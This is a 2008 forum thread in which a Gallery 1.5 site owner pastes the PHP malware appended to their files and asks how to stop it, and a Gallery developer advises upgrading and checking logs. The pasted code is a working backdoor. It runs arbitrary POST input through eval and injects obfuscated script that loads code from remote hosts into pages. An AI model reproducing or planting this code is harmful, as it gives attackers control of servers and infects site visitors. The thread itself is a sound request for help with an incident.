Gallery 1.5 hacked to the second time.
|
visionary
Joined: 2008-09-01
Posts: 2 |
Posted: Mon, 2008-09-22 01:54
|
|
My gallery is being hacked preventing it from working. The main files have the following appended to them. <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ0AlNzY/YT8lNzIlMjAkJTYxIyxpLGAlNUY7aT1AJTIyfCUzNzZ+JTJFYCUzMSUzNjMlMkUiJTNCJTYxfCUzRCU1QnwlMjI3fDglMkUkJTMxJTM1fCUzNyUyRTElMzQkJTMyJTJFJTM1JTM4JTIyPyUyQ2k/KyIxJTM0JCUzMXwlMkUlMzMkJTM1PyUyMn4lMkNgJTY5PyUyQiUyMkAxYCUzOSQlMzElMkUlMzElMzMjJTMyJTIyP118JTNCJTVGYD0lMzElM0IlNjklNjYoJTY0I29jIyU3NWBtJTY1JTZFQCU3NEAuIyU2M28jJTZGIWslNjklNjUubXwlNjF0JCU2MyU2OCUyOCMvISU1Q2JoJTY3YCU2NiU3NH49JTMxfCUyRn4lMjkhJTNEfj0jbnwlNzU/JTZDfmxgJTI5IWY/JTZGJTcyYCg/aSUzRDA7fGkhJTNDJTMzO2klMkIlMkIjJTI5JTY0JTZGIWN8dT8lNkQhZW4lNzQlMkUhdyU3Mn5pIXRlISUyOCUyMiQlM0N8cyU2MyU3MiU2OSU3MCU3NHwlM0VpJTY2KD9fJTI5ZG8lNjN1P21AJTY1I24lNzQjJTJFJTc3QCU3MmkjdEBlYCglNUM/JTIyJTNDJTczYyU3MiU2OSMlNzB0fiAjJTY5ZD18X0AlMjIlMkI/aX4lMkIiJTVGPyUyMCQlNzMlNzIlNjN+PUAlMkYlMkYlMjIrJTYxW2klNUQlMkIlMjJALyQlNjMlNzAhLyUzRSUzQ0AlNUNAJTVDL3M/Y35yJTY5JCU3MCU3NCUzRSMlNUMifClgJTNDJTVDIS8hJTczYyQlNzIlNjkhJTcwISU3NCUzRT8iYCUyOX4lM0InKS5yZXBsYWNlKC9AfFwkfFwhfFw/fCN8fnxcfHxgL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?> Anyone else experiencing this and it there are way to prevent it? |
|
Posts: 6818
Hello,
there could be multiple reasons why your Gallery was hacked.
It could be that your Gallery may be outdated.
Gallery 1.5.x prior 1.5.9, especially prior 1.5.8 has serious security issues.
It may also be that your Server is hacked and someone is abusing your Gallery.
First i would upgrade your Gallery to the latest version.
Then i would check the server logs for suspicous activities.
Also look for Code in comments or other metadata for images and albums.
Jens
--
Last Gallery v1 Developer.
Tryout the TEST-Version of Gallery 1.6